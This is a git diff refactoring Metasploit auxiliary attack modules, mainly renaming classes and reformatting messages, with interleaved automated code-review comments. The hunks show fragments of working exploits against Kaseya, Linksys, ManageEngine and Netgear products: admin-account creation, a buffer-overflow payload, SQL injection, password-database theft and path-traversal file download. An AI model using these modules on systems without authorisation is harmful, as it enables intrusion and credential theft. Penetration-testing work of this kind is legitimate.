@@ -101,28 +101,28 @@ class Metasploit3 < Msf::Auxiliary delete_res << delete_file('./', stager_base + '.war', '') delete_res.each do |res| if !res - print_warning("#{peer} - Unable to remove WAR [No Response]") + print_warning("Unable to remove WAR [No Response]") elsif (res.code < 200 || res.code >= 300) - print_warning("#{peer} - WARNING: Unable to remove WAR [#{res.code} #{res.message}]") + print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]") end end end # Undeploy the WAR and the stager if needed def undeploy_action(app_base) - print_status("#{peer} - Undeploying #{app_base} via DeploymentFileRepository.remove()...") + print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...") print_status("This might take some time, be patient...") if http_verb == "HEAD" res = delete_file('./', app_base + '.war', '') unless res - print_error("#{peer} - Unable to remove WAR (no response)") + print_error("Unable to remove WAR (no response)") return end if res.code < 200 || res.code >= 300 - print_error("#{peer} - Unable to remove WAR [#{res.code} #{res.message}]") + print_error("Unable to remove WAR [#{res.code} #{res.message}]") else - print_good("#{peer} - Successfully removed") + print_good("Successfully removed") end end diff --git a/modules/auxiliary/admin/http/jboss_seam_exec.rb b/modules/auxiliary/admin/http/jboss_seam_exec.rb index e6b097d165..dc8ab507f2 100644 --- a/modules/auxiliary/admin/http/jboss_seam_exec.rb +++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/kaseya_master_admin.rb b/modules/auxiliary/admin/http/kaseya_master_admin.rb index 5703684ca9..27758ccaf5 100644 --- a/modules/auxiliary/admin/http/kaseya_master_admin.rb +++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -53,11 +53,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.body && res.body.to_s =~ /ID="sessionVal" name="sessionVal" value='([0-9]*)'/ session_val = $1 else - print_error("#{peer} - Failed to get sessionVal") + print_error("Failed to get sessionVal") return end - print_status("#{peer} - Got sessionVal #{session_val}, creating Master Administrator account") + print_status("Got sessionVal #{session_val}, creating Master Administrator account") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'LocalAuth', 'setAccount.aspx'), @@ -73,11 +73,11 @@ class Metasploit3 < Msf::Auxiliary }) unless res && res.code == 302 && res.body && res.body.to_s.include?('/vsapres/web20/core/login.asp') - print_error("#{peer} - Master Administrator account creation failed") + print_error("Master Administrator account creation failed") return end - print_good("#{peer} - Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") + print_good("Master Administrator account with credentials #{datastore['KASEYA_USER']}:#{datastore['KASEYA_PASS']} created") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index e442620315..77d4c9095a 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/limesurvey_file_download.rb b/modules/auxiliary/admin/http/limesurvey_file_download.rb index a1c019c933..2dc0009268 100644 
--- a/modules/auxiliary/admin/http/limesurvey_file_download.rb +++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb @@ -8,7 +8,7 @@ require 'msf/core' # for extracting files require 'zip' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb index 0bae51aafa..e462ad3985 100644 --- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb +++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb index e3acc7bf4b..9aaf2112f8 100644 --- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb +++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient 
@@ -34,20 +34,20 @@ class Metasploit3 < Msf::Auxiliary end def check_login(user) - print_status("#{peer} - Trying to login with #{user} and empty password") + print_status("Trying to login with #{user} and empty password") res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,"") }) if res.nil? || res.code == 404 - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false elsif [200, 301, 302].include?(res.code) - print_good("#{peer} - Successful login #{user} and empty password") + print_good("Successful login #{user} and empty password") return true else - print_status("#{peer} - No login possible with #{user} and empty password") + print_status("No login possible with #{user} and empty password") return false end end @@ -56,15 +56,15 @@ class Metasploit3 < Msf::Auxiliary begin if check_login("admin") - print_good("#{peer} - login with user admin and no password possible. There is no need to use this module.") + print_good("login with user admin and no password possible. There is no need to use this module.") return end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end - print_status("#{peer} - Resetting password for the admin user ...") + print_status("Resetting password for the admin user ...") postdata = Rex::Text.rand_text_alpha(246) # Filler postdata << [0x81544AF0].pack("N") # $s0, address of admin password in memory 
@@ -94,15 +94,15 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 500 if check_login("admin") - print_good("#{peer} - Expected answer and the login was successful. Try to login with the user admin and a blank password") + print_good("Expected answer and the login was successful. Try to login with the user admin and a blank password") else - print_status("#{peer} - Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") + print_status("Expected answer, but unknown exploit status. Try to login with the user admin and a blank password") end else - print_error("#{peer} - Unexpected answer. Exploit attempt has failed") + print_error("Unexpected answer. Exploit attempt has failed") end rescue ::Rex::ConnectionError - print_error("#{peer} - Failed to connect to the web server") + print_error("Failed to connect to the web server") return end end diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index c1ad331aae..1ab5cca3ca 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb index 06f5ffceca..520a9b8c79 100644 --- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb +++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report 
@@ -65,10 +65,10 @@ class Metasploit3 < Msf::Auxiliary # Yes, "sucess" is really mispelt, as is "Servelet" ... ! unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/ - print_error("#{peer} - Administrator account creation failed") + print_error("Administrator account creation failed") end - print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + print_good("Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}") service_data = { address: rhost, port: rport, diff --git a/modules/auxiliary/admin/http/manageengine_dir_listing.rb b/modules/auxiliary/admin/http/manageengine_dir_listing.rb index cf33a28787..6c3f67dcd8 100644 --- a/modules/auxiliary/admin/http/manageengine_dir_listing.rb +++ b/modules/auxiliary/admin/http/manageengine_dir_listing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie 
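Review bot: In manage_engine_dc_create_admin.rb (`@@ -65,10`), the failure branch prints "Administrator account creation failed" but has no `return`, so the `print_good` line and the `service_data` block after it still run when the response check fails. That reports, and apparently records, credentials for an account that was never created; the kaseya_master_admin.rb hunk in this same diff returns after its equivalent error. Add `return` directly after the `print_error` call. The rest of the credential-reporting code lies outside the hunk.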
@@ -182,14 +182,14 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 else cookie = get_cookie end if cookie.nil? - print_error("#{peer} - Failed to get application cookies!") + print_error("Failed to get application cookies!") return end @@ -205,7 +205,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Listing directory #{datastore['DIRECTORY']}") + print_status("Listing directory #{datastore['DIRECTORY']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -216,7 +216,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File with directory listing saved in: #{path}") else - print_error("#{peer} - Failed to list directory.") + print_error("Failed to list directory.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_file_download.rb b/modules/auxiliary/admin/http/manageengine_file_download.rb index 49331f2752..a7c393952d 100644 --- a/modules/auxiliary/admin/http/manageengine_file_download.rb +++ b/modules/auxiliary/admin/http/manageengine_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary end if datastore['USERNAME'] && datastore['PASSWORD'] - print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") + print_status("Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...") cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD']) unless cookie.nil? return cookie 
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary default_users = ['guest', 'administrator', 'admin'] default_users.each do |user| - print_status("#{peer} - Trying to authenticate as #{user}...") + print_status("Trying to authenticate as #{user}...") cookie = authenticate_it360(uri[0], uri[1], user, user) unless cookie.nil? return cookie @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary end if detect_it360 - print_status("#{peer} - Detected IT360, attempting to login...") + print_status("Detected IT360, attempting to login...") cookie = login_it360 if cookie.nil? - print_error("#{peer} - Failed to login to IT360!") + print_error("Failed to login to IT360!") return end else @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'POST', 'cookie' => cookie, @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary } }) rescue Rex::ConnectionRefused - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or is empty.") + print_error("0 bytes returned, file does not exist or is empty.") return end @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Auxiliary ) print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 5fa29d0f9c..032c4d5db7 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def run unless check == Exploit::CheckCode::Appears - print_error("#{peer} - Fingerprint hasn't been successful, trying to exploit anyway...") + print_error("Fingerprint hasn't been successful, trying to exploit anyway...") end version = get_version @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary creds = inject_sql(version < 7000 ? true : false) username = creds[0] password = creds[1] - print_good("#{peer} - Created a new Super Administrator with username: #{username} | password: #{password}") + print_good("Created a new Super Administrator with username: #{username} | password: #{password}") cookie_su = login(username, password) @@ -241,10 +241,10 @@ class Metasploit3 < Msf::Auxiliary fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate as Super Administrator, account #{username} might not work.") end - print_status("#{peer} - Reporting Super Administrator credentials...") + print_status("Reporting Super Administrator credentials...") report_super_admin_creds(username, password) - print_status("#{peer} - Leaking Password database...") + print_status("Leaking Password database...") loot_passwords(cookie_su) end @@ -308,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && res.body && res.body.to_s.length > 0 vprint_line(res.body.to_s) - print_good("#{peer} - Successfully exported password database from Password Manager Pro.") + print_good("Successfully exported password database from Password Manager Pro.") loot_name = 'manageengine.passwordmanagerpro.password.db' loot_type = 'text/csv' loot_filename = 'manageengine_pmp_password_db.csv' 
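Review bot: In manageengine_pmp_privesc.rb (`@@ -233,7`), `inject_sql(version < 7000 ? true : false)` wraps a comparison that is already a boolean; `inject_sql(version < 7000)` says the same thing. A one-line comment on why 7000 is the cut-over would document the magic number. `creds[0]`/`creds[1]` could be destructured as `username, password = creds`. The `run` method begins in the previous hunk and continues past this one.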
@@ -320,9 +320,9 @@ class Metasploit3 < Msf::Auxiliary res.body, loot_filename, loot_desc) - print_status("#{peer} - Password database saved in: #{p}") + print_status("Password database saved in: #{p}") else - print_error("#{peer} - Failed to export Password Manager Pro passwords.") + print_error("Failed to export Password Manager Pro passwords.") end end end diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb index 23df8b7b73..1fbc3bcf01 100644 --- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb +++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Copying file to Web location...") + print_status("Copying file to Web location...") dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" res = send_request_cgi( @@ -86,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} copied to #{dst_path} successfully") + print_good("File #{file} copied to #{dst_path} successfully") else - print_error("#{peer} - Failed to copy #{file} to #{dst_path}") + print_error("Failed to copy #{file} to #{dst_path}") end - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { 
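Review bot: In mutiny_frontend_read_delete.rb, `read_file` (`@@ -86,12`) logs "Failed to copy ..." and then carries on to the retrieval request with no early exit. If a file of that name is already present at the web location, the 200 check in the following hunk would store it as loot even though the copy failed; that is an inference, since the request parameters are outside the hunk. Returning after the `print_error`, or jumping to the cleanup step, keeps the stored loot tied to a successful copy.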
@@ -101,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end # Cleanup @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -125,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /\{"success":true\}/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end diff --git a/modules/auxiliary/admin/http/netflow_file_download.rb b/modules/auxiliary/admin/http/netflow_file_download.rb index 8e147f4927..43936f647b 100644 --- a/modules/auxiliary/admin/http/netflow_file_download.rb +++ b/modules/auxiliary/admin/http/netflow_file_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient 
@@ -46,21 +46,21 @@ class Metasploit3 < Msf::Auxiliary def run # Create request begin - print_status("#{peer} - Downloading file #{datastore['FILEPATH']}") + print_status("Downloading file #{datastore['FILEPATH']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', 'CSVServlet'), 'vars_get' => { 'schFilePath' => datastore['FILEPATH'] }, }) rescue Rex::ConnectionError - print_error("#{peer} - Could not connect.") + print_error("Could not connect.") return end # Show data if needed if res && res.code == 200 if res.body.to_s.bytesize == 0 - print_error("#{peer} - 0 bytes returned, file does not exist or it is empty.") + print_error("0 bytes returned, file does not exist or it is empty.") return end vprint_line(res.body.to_s) @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Failed to download file.") + print_error("Failed to download file.") end end end diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 0e78a31723..0d4f97095a 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient 
@@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Authenticated File Download', 'Description' => %q{ - Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. - The application has a file download vulnerability that can be exploited by an - authenticated remote attacker to download any file in the system.. - This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. + Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. + The application has a file download vulnerability that can be exploited by an + authenticated remote attacker to download any file in the system.. + This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ @@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary [ ['CVE', '2016-1524'], ['US-CERT-VU', '777024'], - ['URL', 'TODO_GITHUB_URL'], - ['URL', 'TODO_FULLDISC_URL'] + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DisclosureDate' => 'Feb 4 2016')) @@ -41,6 +41,11 @@ class Metasploit3 < Msf::Auxiliary OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']), OptString.new('FILEPATH', [false, 'Path of the file to download minus the drive letter', '/Windows/System32/calc.exe']), ], self.class) + + register_advanced_options( + [ + OptInt.new('DEPTH', [false, 'Max depth to traverse', 15]) + ], self.class) end def authenticate 
@@ -146,16 +151,48 @@ class Metasploit3 < Msf::Auxiliary print_good("File saved in: #{path}") end + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: 'netgear', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :service, + module_fullname: fullname, + username: opts[:user], + private_data: opts[:password], + private_type: :password + }.merge(service_data) + + login_data = { + last_attempted_at: DateTime.now, + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + proof: opts[:proof] + }.merge(service_data) + + create_credential_login(login_data) + end + def run cookie = authenticate if cookie == nil fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.") else - print_good("#{peer} - Logged with successfully.") + print_good("#{peer} - Logged in with #{datastore['USERNAME']}:#{datastore['PASSWORD']} successfully.") + report_cred( + user: datastore['USERNAME'], + password: datastore['PASSWORD'], + proof: cookie + ) end - if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty? + if datastore['FILEPATH'].blank? fail_with(Failure::Unknown, "#{peer} - Please supply the path of the file you want to download.") return end @@ -171,7 +208,7 @@ class Metasploit3 < Msf::Auxiliary print_error("#{peer} - File not found, using bruteforce to attempt to download the file") count = 1 - while count < 15 + while count < datastore['DEPTH'] res = download_file(("../" * count).chomp('/') + filepath, cookie) if res && res.code == 200 if res.body.to_s.bytesize != 0 && (not res.body.to_s =~/This file does not exist./) && (not res.body.to_s =~/operation is failed/) diff --git a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb index 9158af9b7e..311355c401 100644 --- a/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb 
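Review bot: The rewritten success message in `run` (the `@@ -146,16 +151,48 @@` hunk) now interpolates `datastore['PASSWORD']`, so the cleartext password lands in console output and any spooled or shared log, even though the new `report_cred` call already stores it in the workspace. Printing only the account, `print_good("#{peer} - Logged in as #{datastore['USERNAME']} successfully.")`, keeps the secret in one controlled place. `report_cred` also saves the raw session cookie as `proof:`, which persists a live session token in the database; a short marker string may be enough if the cookie is not needed later. The new `report_cred(opts)` has no comment, so a one-line header such as `# Records the working login (opts[:user], opts[:password], opts[:proof]) as a successful credential for this service` would document the expected keys. `run` continues past the end of the hunk.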
+++ b/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -44,16 +44,16 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to access the configuration of the device") + print_status("Trying to access the configuration of the device") # extract device details action = 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' - print_status("#{peer} - Extracting Firmware version...") + print_status("Extracting Firmware version...") extract_data(action) # extract credentials action = 'urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo' - print_status("#{peer} - Extracting credentials...") + print_status("Extracting credentials...") extract_data(action) end @@ -75,26 +75,26 @@ class Metasploit3 < Msf::Auxiliary return if res.headers['Server'] !~ /Linux\/2.6.15 uhttpd\/1.0.0 soap\/1.0/ if res.body =~ /(.*)<\/NewPassword>/ - print_status("#{peer} - Credentials found, extracting...") + print_status("Credentials found, extracting...") extract_credentials(res.body) end if res.body =~ /(.*)<\/ModelName>/ model_name = $1 - print_good("#{peer} - Model #{model_name} found") + print_good("Model #{model_name} found") end if res.body =~ /(.*)<\/Firmwareversion>/ firmware_version = $1 - print_good("#{peer} - Firmware version #{firmware_version} found") + print_good("Firmware version #{firmware_version} found") #store all details as loot loot = store_loot('netgear_soap_device.config', 'text/plain', rhost, res.body) - print_good("#{peer} - Device details downloaded to: #{loot}") + print_good("Device details downloaded to: #{loot}") end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return end end 
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary body.each_line do |line| if line =~ /(.*)<\/NewPassword>/ pass = $1 - print_good("#{peer} - admin / #{pass} credentials found") + print_good("admin / #{pass} credentials found") service_data = { address: rhost, @@ -137,6 +137,6 @@ class Metasploit3 < Msf::Auxiliary # store all details as loot loot = store_loot('netgear_soap_account.config', 'text/plain', rhost, body) - print_good("#{peer} - Account details downloaded to: #{loot}") + print_good("Account details downloaded to: #{loot}") end end diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index 773973688e..c0636e47c6 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb +++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rapid7/nexpose' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb index 8a7c25a70e..166c1ddaad 100644 --- a/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb +++ b/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Trying to delete #{datastore['RPATH']}...") + print_status("Trying to delete #{datastore['RPATH']}...") res = send_request_cgi( { 
@@ -57,9 +57,9 @@ class Metasploit3 < Msf::Auxiliary }, 5) if res and res.code == 200 and res.body =~ /1<\/VERSION>0<\/STATUS>0<\/TRANSID><\/RESULT>/ - print_good("#{peer} - File #{datastore['RPATH']} successfully deleted") + print_good("File #{datastore['RPATH']} successfully deleted") else - print_error("#{peer} - File not deleted") + print_error("File not deleted") end end diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 8f7bacd0cf..b07c68631f 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -8,7 +8,7 @@ require 'rex' require 'net/dns' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 991b706893..52911870ca 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/element' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/scrutinizer_add_user.rb b/modules/auxiliary/admin/http/scrutinizer_add_user.rb index 4f7a947b08..01194f368d 100644 --- a/modules/auxiliary/admin/http/scrutinizer_add_user.rb +++ b/modules/auxiliary/admin/http/scrutinizer_add_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb index d95a6c2802..8162fb9b44 100644 --- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb 
